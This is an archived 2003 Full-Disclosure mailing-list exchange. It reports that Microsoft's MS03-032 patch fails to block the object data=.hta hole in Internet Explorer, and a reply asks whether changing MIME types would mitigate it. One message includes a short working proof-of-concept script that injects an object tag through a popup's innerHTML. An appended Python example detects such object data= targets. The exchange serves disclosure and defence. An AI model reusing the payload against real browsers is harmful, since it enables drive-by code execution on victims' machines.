Message-ID: <003d01c3756f$31eaffd0$6801a8c0@rms>
From: rms at computerbytesman.com (Richard M. Smith)
Subject: BAD NEWS: Microsoft Security Bulletin MS03-032

Can this bug also be fixed by changing the MIME type of HTA files from
"application/hta" to something else? If so, what other MIME types need
to be switched to avoid the <OBJECT DATA=>?

Any thoughts why .HTA files have a MIME type in the first place?

Richard

-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of
http-equiv@...ite.com
Sent: Sunday, September 07, 2003 9:17 AM
To: full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032

Since the cat somehow got out of the bag, and more importantly, this is
so blatantly obvious, herewith is the "Bad News":

The patch for Drew's object data=funky.hta doesn't work:

http://www.malware.com/badnews.html

<script>
var oPopup = window.createPopup();
function showPopup() {
oPopup.document.body.innerHTML = "<object data=ouch.php>";
oPopup.show(0,0,1,1,document.body);
}
showPopup()
</script>
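
Added example (not part of either message above): in the posted script the object tag exists only as a string assigned to innerHTML, so a content filter that inspects markup tags alone never sees it. This Python code reports object data= targets found in markup and in script text separately; the name find_object_data and the sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# <object ... data=VALUE>, value quoted or bare, anywhere in a text run.
OBJECT_DATA = re.compile(
    r"""<object\b[^>]*?\bdata\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>"']+))""",
    re.IGNORECASE)

class _Walker(HTMLParser):
    """Collects object data= values from markup, and raw script text."""
    def __init__(self):
        super().__init__()
        self.markup_hits, self.script_text, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        data = dict(attrs).get("data")
        if tag == "object" and data:
            self.markup_hits.append(data)
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive here as plain text, tags inside them included.
        if self._in_script:
            self.script_text.append(data)

def find_object_data(html):
    """Return (targets in markup, targets built inside script strings)."""
    walker = _Walker()
    walker.feed(html)
    walker.close()
    # Undo JavaScript backslash-escaped quotes before matching.
    script = "".join(walker.script_text).replace('\\"', '"').replace("\\'", "'")
    scripted = [next(g for g in m.groups() if g is not None)
                for m in OBJECT_DATA.finditer(script)]
    return walker.markup_hits, scripted

# Constructed sample: the script from the post plus one plain markup tag.
SAMPLE = """<html><body><object data="funky.hta"></object><script>
var oPopup = window.createPopup();
oPopup.document.body.innerHTML = "<object data=ouch.php>";
oPopup.show(0,0,1,1,document.body);
</script></body></html>"""

if __name__ == "__main__":
    print(find_object_data(SAMPLE))
```

The second list is the one a markup-only filter misses, and its targets need not end in .hta, so a filter keyed on file extension would pass them as well.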